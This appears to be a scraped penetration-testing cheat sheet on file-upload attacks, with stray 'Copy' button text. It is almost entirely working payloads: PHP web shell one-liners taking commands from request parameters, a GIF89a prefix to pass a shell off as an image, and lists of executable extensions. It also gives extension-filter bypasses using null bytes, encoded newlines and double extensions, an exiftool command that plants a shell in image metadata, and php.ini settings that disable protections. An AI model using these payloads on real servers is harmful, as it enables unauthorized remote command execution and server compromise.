Copy GIF89a1
<? php $a = system ( $_GET[ 'cmd' ] ) ; echo $a; ?>
<? php system ( 'whoami' ) ; ?>
<? php exec ( 'whoami' ) ; ?>
<? php passthru ( 'whoami' ) ; ?>
<? php shell_exec ( 'whoami' ) ; ?>
<? php if ( isset ( $_REQUEST[ 'cmd' ] ) ){ echo "<pre>" ; $cmd = ($_REQUEST[ 'cmd' ]); system ( $cmd ) ; echo "</pre>" ; die ; } ?>
<? php preg_replace ( '/. * /e' , 'system("whoami");' , '' ) ; ?>
Copy evil . png; . php
evil . gif . php
evil . gif . php5
evil . php;gif
evil . config
evil . htaccess
-- other - extensions --
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
Copy PHP: . php , . php2 , . php3 , . php4 , . php5 , . php6 , . php7 , . phps , . phps , . pht , . phtm , . phtml , . pgif , . shtml , . htaccess , . phar , . inc
ASP: . asp , . aspx , . config , . ashx , . asmx , . aspq , . axd , . cshtm , . cshtml , . rem , . soap , . vbhtm , . vbhtml , . asa , . cer , . shtml
Jsp: . jsp , . jspx , . jsw , . jsv , . jspf , . wss , . do , . action
Coldfusion: . cfm , . cfml , . cfc , . dbm
Flash: . swf
Perl: . pl , . cgi
Erlang Yaws Web Server: . yaws
Bypass file extensions checks
Copy file . php % 20
file . php % 0 a
file . php % 00
file . php % 0 d % 0 a
file . php /
file . php . \
file .
file . php ... .
file . pHp5 ... .
-Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null byte s) between extensions.
Copy file . png . php
file . png . pHp5
file . php % 00 . png
file . php\x00 . png
file . php % 0 a . png
file . php % 0 d % 0 a . png
flile . phpJunk123png
Copy exiftool - Comment = '<?php system($_REQUEST[' cmd ']); ?>' test . png
php.ini file to bypass restrictions
Copy safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON
shell_exec = ON